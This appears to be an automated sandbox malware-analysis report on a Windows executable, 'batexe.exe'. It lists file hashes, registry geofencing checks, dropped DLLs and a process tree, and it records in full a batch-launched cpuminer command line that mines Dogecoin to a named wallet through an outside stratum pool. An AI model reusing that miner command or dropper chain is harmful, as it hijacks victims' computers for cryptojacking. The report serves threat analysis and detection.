73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17/02/2024, 10:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2456	b2e.exe
1864	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1864	cpuminer-sse2.exe
1864	cpuminer-sse2.exe
1864	cpuminer-sse2.exe
1864	cpuminer-sse2.exe
1864	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2396-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2396 wrote to memory of 2456	2396	batexe.exe	81
PID 2396 wrote to memory of 2456	2396	batexe.exe	81
PID 2396 wrote to memory of 2456	2396	batexe.exe	81
PID 2456 wrote to memory of 4492	2456	b2e.exe	82
PID 2456 wrote to memory of 4492	2456	b2e.exe	82
PID 2456 wrote to memory of 4492	2456	b2e.exe	82
PID 4492 wrote to memory of 1864	4492	cmd.exe	85
PID 4492 wrote to memory of 1864	4492	cmd.exe	85

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2396
- C:\Users\Admin\AppData\Local\Temp\F8E7.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\F8E7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\F8E7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FAB.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4492
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\F8E7.tmp\b2e.exe

Filesize
10.2MB

MD5
bfc082af81052e18962bbb114020f47f

SHA1
24c488157b07ae09bf669f319f353d8e757a5890

SHA256
a680b5867095b482a0f4389c33551dec5dc59451119f850ed31c18b164792ec3

SHA512
7451eca63c418aeefa6809687676f704e86f48d0dae0305d822851a9982fda8fb1ac067e564c8780e49319911f7fe47b91ab3c2edaef861e8a5fa5e96259d72c

Download Submit
C:\Users\Admin\AppData\Local\Temp\F8E7.tmp\b2e.exe

Filesize
1.2MB

MD5
7b0f4c1d8506067fce25df5de733bcb7

SHA1
053b618c2012c6895e9709696395951acf15c165

SHA256
dd9a3eca69a73709146ebc228a433e0fef43ab6c12c2280725d798c7b494216a

SHA512
45ca44d04c436082073475b0bec73cdd3df1f0cc670d9a3d5dd77fc2b3b60ef870af5912d27269107222850b07234060eefb2d272b96de1367ff544cac506618

Download Submit
C:\Users\Admin\AppData\Local\Temp\F8E7.tmp\b2e.exe

Filesize
1.6MB

MD5
1e9446ffe80055b0d0681a975585d4f2

SHA1
e2b13091250549c39e6156044d3d826cfa7cc936

SHA256
6a5e65eb48e3c9f4a594a64b60d57436418cec87e75c9cf93d55746ef761e17c

SHA512
fc3ca72c1070ad153cb9f99b6a1665efb80d83005f575d70437af8d87164bff1c689305570feb80d84889a31fdc0ee1b375576fa9594ee303c2ab0776bf0e2fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\FAB.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.4MB

MD5
4c060185b94ff12cfb8dd8332d0afc1b

SHA1
ac9490c7a9ee9105e46364efa19f3253afadeb3c

SHA256
6ee455a1e690bde8e7916907e39e8c9d7de221dcf8fd11dcfd92b1e8d3e7ad2b

SHA512
c38b8ea1ee07d730e438e5096573eac490152bd831f5dbe7a9749d17c3f8e69dee2c2d40a4c13f5f3ca145682d0016a6b0dac2aad66ef701441b22e7656f8798

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.8MB

MD5
861e3e4202c4c6777e4b9429d5bcab0c

SHA1
e39819168d67f0dd5fef0a9a257782271b3859f5

SHA256
5d605fae74a3a2b7ce7f4511a3547cf32be5c50127c9e0425f65a059cba9a02e

SHA512
8ae611e2de305308be7fa73adf1142f3c08261d5160834923b8688b9f3e60cbbe2c3604a750b8c5691b89c316288a5132b44c6f35e793d0169bd9598c888f8eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
64KB

MD5
e7317a0a343dc63f3fa3bf9ca6e93ff0

SHA1
0d48881feb76cf81fc46614bebfa3c134cada128

SHA256
277a43f17ccc4f0fba87c710212de61a41383bcb94410fa093b50ebd50347a63

SHA512
84ef51472db00cd4e90df3062a3cbc29a994c5cf470e54300d4a2f103ba8fb8279ec87b0561625ea1bccd80a7ad664c63457831b4eb919a7608099430b98a3d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
375KB

MD5
5970a54f2b4e0f2b53a5379db7736f6b

SHA1
57afdbe1f722d9d484a43e78a55036dc7a64ea75

SHA256
e0dc254d6f765fb25cca65dd5f4b1da9db7990883613f4a4915b09670f54f24d

SHA512
d14637182be5167ae60195a919619a9ef2fe1d9c06bcf030f18fa19fd0de1aecd6605dc10b0da2bb8cbcc26c67b447593b6464bc401b533aa5a4ecd7038db7a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
229KB

MD5
25e166089b124f31bd1f9438ff14b9ce

SHA1
ae908bcdfb72d5dc87f368b5ba535cbce7666487

SHA256
6f6bb820d0859fff04c5302d191a9b233dede76a9efe073d848253b1fd3f5191

SHA512
440219cdba58b5b1cdb02cfbf4d784fe14531e73c500a5228a9417a1cb8aa01412cc23b957c50d8bcd3097c9202850ffccd830cd2e2c40e49bc9b605ca690317

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
170KB

MD5
4485a43dc113ef892e444cd4614de449

SHA1
8eda1838987708ecf8a00579abfe26730c90dbe4

SHA256
6db626bff6f28a9b35ec7a6c0f5492127f9ee340a877b1583acf00f5d935e421

SHA512
01ecf5100ab351a7fa4baa9e1513c0f517607a3a7beef767a0b7e98bb1a0e316a6d5905eadf1b3ad95defe0dc56ddf2747cd89e78b485ad33186ab136467cf1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
197KB

MD5
84441ea094651b0c5e1691c03cec671e

SHA1
7debcbe24a0e42ba75f5263c753f4503d97c1593

SHA256
b3544289420780ca3df4fb0e0c65f05ef1d94193465b26ddfb3615aac4d0d5b6

SHA512
860ff47b9103450f026d954db54cb3efc246a2c34734bb14e1108e29276428ea9dc3b660984a0828696132b00e70815c6edb4c670fe65c405bbff8b8eae935dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
342KB

MD5
36ccd98e4aea68f02e256b8f308ef530

SHA1
7ab11067ab13704fdb58702a4351e2151312ac24

SHA256
98b1a3dd5e33080c0a283504149b9ccf1b96ce34933709c6495bbc3df917dd8e

SHA512
b3d5d1175f6867ea2813a4019ad5b57143cebec31f8df4af7a14d2f1038ed098cf0f83ed5dda3a190b950290ea8534b5c4dd8904adec43608e55035a62b7b6f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
176KB

MD5
23ec4397e3ba570abc3b6ac66c54eb45

SHA1
c7cc90de33fbef628d9e3b3bb95f876fbe85d45b

SHA256
84d90917db4aa5f235bc09c7fbb0b5c17b6fe0b8c6aed8662db03da86dbf447d

SHA512
1f47ecaf3ebeee34497fa37e88d1bb56de6f89edb7c47b7543ec032ffbe1185f02f9ac6676eed1ef059d7fe61426420d451af589e978f30108b285c496e7da2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
320KB

MD5
1ae43cc09627ff82d15527ea2693fd76

SHA1
c39ffa1a4b80c29fa1f5caed3e7d091253266c66

SHA256
b63980c9d592a6d0d8521f74bd4c6f7cc4ae5f8c3320d2bd63764c56648ac45f

SHA512
21945e4e2fad3ee2b2a19d19bbbc1ada832c33a0d3bf499d6ac8f093b39021323ea0f7df3d54167a3456cbaf01ff126a6e6abbe17dd4eb8d5a24ca000888c271

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
137KB

MD5
5b37b2b134521bbeac3d1190457e25ab

SHA1
eb2bebe2c7507e3135943dfc0ebb71b3e9c55d76

SHA256
7731d7dfe5bb127b8de1bc5d1ef2f958c2f200de94891089859335422af7260c

SHA512
6011a76b9cbf862cc1ca4164476f4d6f3bd654a6aca377d40c0aa53504d033f93fdbdd2a5efa9da487eaaa3ccae9b132e4a1dc61afd3bdab6d4f8dbfeb787c78

Download Submit
memory/1864-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-46-0x00000000635D0000-0x0000000063668000-memory.dmp

Filesize
608KB

Download
memory/1864-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1864-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1864-47-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/1864-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1864-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2396-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2456-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2456-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download